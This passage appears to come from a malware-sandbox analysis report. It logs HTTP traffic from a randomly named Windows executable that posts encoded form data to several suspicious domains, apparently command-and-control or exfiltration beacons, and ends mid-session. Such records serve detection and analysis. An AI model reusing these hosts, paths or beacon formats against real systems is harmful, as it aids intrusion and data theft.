                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.65734965.21.196.90802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:10.086639881 CEST1788OUTPOST /y045/ HTTP/1.1
                                                                                                                          Host: www.030002837.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.030002837.xyz
                                                                                                                          Referer: http://www.030002837.xyz/y045/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 4b 42 75 59 61 4f 6a 4c 4e 69 65 58 30 44 48 35 58 45 30 79 6d 76 77 44 4d 65 39 56 6c 57 55 67 37 72 52 75 44 6c 76 58 42 6e 45 43 62 50 72 4e 30 5a 41 68 42 73 44 6d 32 6d 48 4e 2f 46 7a 41 49 71 63 63 62 32 70 4e 53 30 32 4d 33 52 35 51 6b 45 6f 4d 44 37 77 75 66 74 58 6f 67 31 56 72 67 52 65 36 32 38 6c 30 69 68 39 6b 4f 79 50 75 38 61 72 4b 33 57 70 75 6a 4f 33 52 6c 42 2f 2f 64 32 63 6c 4f 53 5a 4c 73 43 62 64 6f 33 32 4b 34 53 41 45 70 2f 41 34 39 69 49 4a 4c 62 4c 76 77 66 64 41 77 37 76 6a 69 65 55 66 34 63 63 36 48 6c 6b 36 4a 63 47 56 58 4a 66 42 44 6e 51 53 2b 54 42 41 47 71 5a 2f 56 38 58 44 33 59 43 55 62 51 6a 38 36 2b 71 38 4d 66 49 77 74 6c 4d 53 53 4b 31 6c 49 31 38 41 6c 6a 48 68 78 34 4d 54 47 49 45 4d 49 54 6b 54 37 74 44 76 71 65 4e 50 52 49 52 71 4c 68 69 4d 7a 32 63 45 53 72 70 49 4e 48 75 4b 75 5a 69 61 79 79 73 69 4c 47 38 42 35 35 6c 6e 74 6d 76 51 7a 6d 69 6b 6b 70 4d 65 74 63 71 47 4e 34 65 79 4f 50 38 32 2b 77 50 65 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=/3pi4VdoD972KBuYaOjLNieX0DH5XE0ymvwDMe9VlWUg7rRuDlvXBnECbPrN0ZAhBsDm2mHN/FzAIqccb2pNS02M3R5QkEoMD7wuftXog1VrgRe628l0ih9kOyPu8arK3WpujO3RlB//d2clOSZLsCbdo32K4SAEp/A49iIJLbLvwfdAw7vjieUf4cc6Hlk6JcGVXJfBDnQS+TBAGqZ/V8XD3YCUbQj86+q8MfIwtlMSSK1lI18AljHhx4MTGIEMITkT7tDvqeNPRIRqLhiMz2cESrpINHuKuZiayysiLG8B55lntmvQzmikkpMetcqGN4eyOP82+wPe7RGz/tJInRD+A6sEA+9YJCp2m/Lx3i2vKVYQ8kUO1xJxB5knJJ2HsAizJ4Zv13UFCUyVzBDOu7pTpbC7PJAiPTRr3OmiOSb++IG1F017XulGoTePyUDIyylb9HV7XnLIHb/ZvOD6vEXvV6bDuwfzURvfi28MuEWc7ik9wW5cTU09sAWi0U48nX73KOg9kysNc2Ik0BnEuENn7Pt8tYQmY+DrRnw12ePyct6flmrLwYqgaxOv7TfNQIdG4BXa8DSg37v/77g5hRa9DFoZl8hk9Y/nkfzHr/iNm+g4HrrkkpxITY92sN9jfSii2YXstsq4WEuyUfJls0QMmaWmglmU42ZFRSh96ikXzjQ2+ZBxhYQkKlymznInV7OHttYC837xDmnZWQArgY4W7nBwidOgQljI7xaAR66uOnx9rjK0vs92NUJXh+qdIYITrRMv3myrIjQzCCeovhkfgup4GCIZRSQgqxDZo5urbzmAdvsCZxD/FsU1aChcw8svKncrzCoOEFhaI3pkUcR8RUqdHr400BAQ215Q+Ka9AqlKBEKG68eIzdsrnbpTuvq6pE+wUibDkNh1YVSVokdxRfy3uYIydVhUbC/AmFlz99MzxkWwVla8Sg6uSzuqh8EnvS244nZXAydG+TCnhjjKwiH8ewVnB5XyKn7FHzjcqh [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:27:10.688008070 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 796
                                                                                                                          date: Mon, 21 Oct 2024 15:27:10 GMT
                                                                                                                          vary: User-Agent
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.65735065.21.196.90802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:12.627065897 CEST496OUTGET /y045/?qFHlI=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopZ2qqizp83SA4VvMOfKjYwWha+waZ/9hnzA5UcC/NzqTplHtuhYQ=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.030002837.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:27:13.233931065 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 796
                                                                                                                          date: Mon, 21 Oct 2024 15:27:13 GMT
                                                                                                                          vary: User-Agent
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.6573513.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:18.544778109 CEST754OUTPOST /m7sk/ HTTP/1.1
                                                                                                                          Host: www.ethetf.digital
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.ethetf.digital
                                                                                                                          Referer: http://www.ethetf.digital/m7sk/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 5a 43 46 58 4d 6a 73 32 57 51 4e 43 2b 75 44 73 50 65 69 43 48 39 66 59 37 4b 74 77 64 2b 57 53 37 2f 70 2b 32 45 30 6e 4a 6e 77 50 6d 72 36 2b 78 57 59 73 34 69 58 5a 6f 46 71 36 6c 5a 44 6f 57 79 2f 61 56 4f 37 59 6c 66 6e 77 2b 64 4d 4c 75 31 6c 4e 6f 4e 34 46 47 63 4b 31 70 4b 64 66 6c 4c 33 78 4a 4b 4b 30 58 6f 74 32 56 37 76 49 78 75 69 59 4b 49 78 74 5a 65 70 72 75 59 59 37 2b 2b 61 34 2b 78 47 41 73 57 55 56 43 4c 36 53 72 4c 75 68 6d 73 4c 49 63 57 46 4e 32 4a 56 32 6a 45 48 4b 2f 67 4f 63 79 67 70 6e 39 7a 76 76 66 50 66 75 6b 57 6f 57 62 68 4f 4a 70 42 6d 58
                                                                                                                          Data Ascii: qFHlI=N4YjnbeBsaICZCFXMjs2WQNC+uDsPeiCH9fY7Ktwd+WS7/p+2E0nJnwPmr6+xWYs4iXZoFq6lZDoWy/aVO7Ylfnw+dMLu1lNoN4FGcK1pKdflL3xJKK0Xot2V7vIxuiYKIxtZepruYY7++a4+xGAsWUVCL6SrLuhmsLIcWFN2JV2jEHK/gOcygpn9zvvfPfukWoWbhOJpBmX


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.6573523.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:21.084517002 CEST778OUTPOST /m7sk/ HTTP/1.1
                                                                                                                          Host: www.ethetf.digital
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.ethetf.digital
                                                                                                                          Referer: http://www.ethetf.digital/m7sk/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 59 6e 4e 58 4b 43 73 32 65 51 4e 42 78 4f 44 73 57 75 69 47 48 39 54 59 37 4c 70 67 64 73 43 53 69 62 74 2b 33 41 6f 6e 4b 6e 77 50 75 4c 36 37 75 47 59 64 34 69 62 2f 6f 41 4b 36 6c 61 2f 6f 57 7a 50 61 56 5a 76 5a 6d 76 6e 79 72 4e 4d 4e 7a 46 6c 4e 6f 4e 34 46 47 63 50 75 70 4b 56 66 6d 36 48 78 4a 6f 69 72 64 49 74 33 53 37 76 49 37 4f 69 6d 4b 49 78 44 5a 61 68 52 75 61 51 37 2b 36 57 34 35 6c 71 42 6d 57 55 62 64 62 37 33 75 70 72 56 6a 50 69 56 66 58 52 2b 70 75 74 4e 69 79 47 51 6a 54 4f 2f 67 77 4a 6c 39 78 33 64 66 76 66 45 6d 57 51 57 4a 32 43 75 6d 31 44 30 46 6c 64 58 55 66 7a 4c 54 38 34 6b 46 7a 61 63 4b 32 34 57 33 67 3d 3d
                                                                                                                          Data Ascii: qFHlI=N4YjnbeBsaICYnNXKCs2eQNBxODsWuiGH9TY7LpgdsCSibt+3AonKnwPuL67uGYd4ib/oAK6la/oWzPaVZvZmvnyrNMNzFlNoN4FGcPupKVfm6HxJoirdIt3S7vI7OimKIxDZahRuaQ7+6W45lqBmWUbdb73uprVjPiVfXR+putNiyGQjTO/gwJl9x3dfvfEmWQWJ2Cum1D0FldXUfzLT84kFzacK24W3g==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.6573533.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:23.641599894 CEST1791OUTPOST /m7sk/ HTTP/1.1
                                                                                                                          Host: www.ethetf.digital
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.ethetf.digital
                                                                                                                          Referer: http://www.ethetf.digital/m7sk/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 4e 34 59 6a 6e 62 65 42 73 61 49 43 59 6e 4e 58 4b 43 73 32 65 51 4e 42 78 4f 44 73 57 75 69 47 48 39 54 59 37 4c 70 67 64 73 61 53 2b 34 31 2b 32 6e 63 6e 45 48 77 50 67 72 36 36 75 47 59 36 34 69 54 37 6f 41 47 45 6c 66 7a 6f 45 68 48 61 42 39 44 5a 78 66 6e 79 30 39 4d 49 75 31 6c 45 6f 4e 6f 5a 47 63 2f 75 70 4b 56 66 6d 35 66 78 41 61 4b 72 4f 59 74 32 56 37 76 50 78 75 6a 4c 4b 49 70 31 5a 61 73 75 75 4a 49 37 35 65 36 34 34 57 53 42 75 57 55 5a 65 62 37 56 75 6f 58 4b 6a 4f 4f 5a 66 58 6c 48 70 70 64 4e 67 79 43 47 7a 7a 4f 51 33 42 31 37 39 6a 66 36 64 49 54 62 76 31 4d 48 59 55 43 43 75 32 72 58 63 79 39 4b 63 2b 53 4c 59 71 59 5a 62 47 6a 4e 45 33 6c 52 71 44 37 46 71 55 54 76 73 32 7a 68 69 46 6c 6e 66 5a 6e 72 71 72 46 79 31 5a 75 35 47 56 33 44 56 42 31 4d 33 50 4a 43 75 44 4c 41 6a 43 2f 4a 32 61 51 4a 55 56 52 6a 48 66 6a 46 62 67 4e 64 5a 51 58 67 57 41 64 69 70 62 46 79 46 44 59 43 66 30 41 6a 49 61 6b 31 61 68 38 34 4b 31 76 64 31 37 54 49 4e 66 59 69 43 6b 31 43 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=N4YjnbeBsaICYnNXKCs2eQNBxODsWuiGH9TY7LpgdsaS+41+2ncnEHwPgr66uGY64iT7oAGElfzoEhHaB9DZxfny09MIu1lEoNoZGc/upKVfm5fxAaKrOYt2V7vPxujLKIp1ZasuuJI75e644WSBuWUZeb7VuoXKjOOZfXlHppdNgyCGzzOQ3B179jf6dITbv1MHYUCCu2rXcy9Kc+SLYqYZbGjNE3lRqD7FqUTvs2zhiFlnfZnrqrFy1Zu5GV3DVB1M3PJCuDLAjC/J2aQJUVRjHfjFbgNdZQXgWAdipbFyFDYCf0AjIak1ah84K1vd17TINfYiCk1CvKbD1+i00dSguS3OWdzFsvB2It96cyQvDk6mslJP+ZciY2gyqIjMObNVc0j00dT8/OfZRyip8HfS5sqoTLvVCtoT8paonkH+C5EKhN7LHxYdKDn/xa05tQVBxXyW577SayvBKK4ENiN5zObMQ95MLKyzmum17Lmd//w50CS4rAWqPAg5PmqHxEGuOdgTWIfLJBFiu6VT+dcJrtf3fAHGFksum6KhHxEvCbZ8UVgBODtYx5DmlPnHeswfhHOz5JwAymE6OneEmUdrN+mvReSzK29Kz1b4ERgkbXsczefdEsfiV7e+Dld0lRjE3AOy0JfqZCr0Rdv42q+m+dXKPB0636ghL+l2LvqqY/dX/BrWuOsYX0HsxD2OjgwmCGy+zXbp85EMly3hihJ/R8y/uHplDudkpP4lbIYDir3ONnqj+F3jzwY0XxNMbAHUfpIHI2DFSs1XpSpla/kZYUbAc6AHUTvp0VvFGgajCZb41TgefANJogneeSxXIwPHQspjyj7sht0ASjZZWrSMLLD6ePfms4OvxsLgAQmiFLj8rztGmti1/awQiF1uwVT0auYCsBkdu9vZvN2jhKW46qq4Nn7BC5RfIEI7tGZdOJvXi1MmBtnzazYlAvJn1eVq2c+GctoA0G9lqSFWzGfyk/tVvA2gyUg9F4dahYGdNU [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.6573543.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:26.191431999 CEST497OUTGET /m7sk/?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.ethetf.digital
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:27:26.618349075 CEST417INHTTP/1.1 200 OK
                                                                                                                          Server: openresty
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 277
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 46 48 6c 49 3d 41 36 77 44 6b 74 58 4e 2b 71 38 4c 62 47 73 47 41 32 30 44 66 58 31 32 30 4c 66 43 4f 38 6e 75 4e 38 37 74 36 4a 5a 4d 4f 2b 61 34 6f 59 5a 73 2f 51 52 39 41 58 63 6e 32 71 33 44 73 44 6b 4f 76 32 48 63 37 53 71 35 31 4f 48 2b 57 6c 4c 61 4b 4a 43 38 78 4a 50 50 2f 72 49 61 38 32 5a 6e 2b 4b 6b 41 47 75 66 2b 76 4a 70 62 30 36 4c 42 43 70 43 63 50 62 51 30 49 59 72 6a 34 63 2b 37 65 4c 6c 75 64 61 49 3d 26 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0"}</script></head></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.6573553.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:31.683005095 CEST748OUTPOST /12c7/ HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.booosted.xyz
                                                                                                                          Referer: http://www.booosted.xyz/12c7/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 61 31 71 4d 77 53 75 6a 4b 47 44 76 78 4e 4f 57 4b 72 5a 7a 76 77 46 49 44 35 48 63 39 64 30 70 57 4b 57 37 4a 51 76 79 67 56 61 55 49 6f 72 2f 33 4a 38 54 45 70 51 51 61 78 59 63 6b 61 49 43 73 36 6e 59 72 48 79 4b 44 6c 39 38 57 30 41 71 79 46 66 41 74 41 58 71 4e 76 37 69 42 7a 42 4f 63 63 2b 49 6a 4b 31 6a 6c 51 4a 35 4f 64 78 50 68 64 79 54 68 54 33 6f 47 53 36 76 77 34 31 31 33 32 43 63 74 4c 55 53 47 5a 74 45 46 49 6c 2b 74 35 48 79 61 2f 44 6b 33 70 62 55 46 39 7a 36 78 2b 31 67 42 55 37 43 75 61 44 59 7a 4e 34 49 48 54 43 77 75 6e 50 74 53 47 4c 49 64 44 54 71
                                                                                                                          Data Ascii: qFHlI=mmiLmwXyfZXga1qMwSujKGDvxNOWKrZzvwFID5Hc9d0pWKW7JQvygVaUIor/3J8TEpQQaxYckaICs6nYrHyKDl98W0AqyFfAtAXqNv7iBzBOcc+IjK1jlQJ5OdxPhdyThT3oGS6vw41132CctLUSGZtEFIl+t5Hya/Dk3pbUF9z6x+1gBU7CuaDYzN4IHTCwunPtSGLIdDTq


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.6573563.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:27:34.225598097 CEST772OUTPOST /12c7/ HTTP/1.1
                                                                                                                          Host: www.booosted.xyz
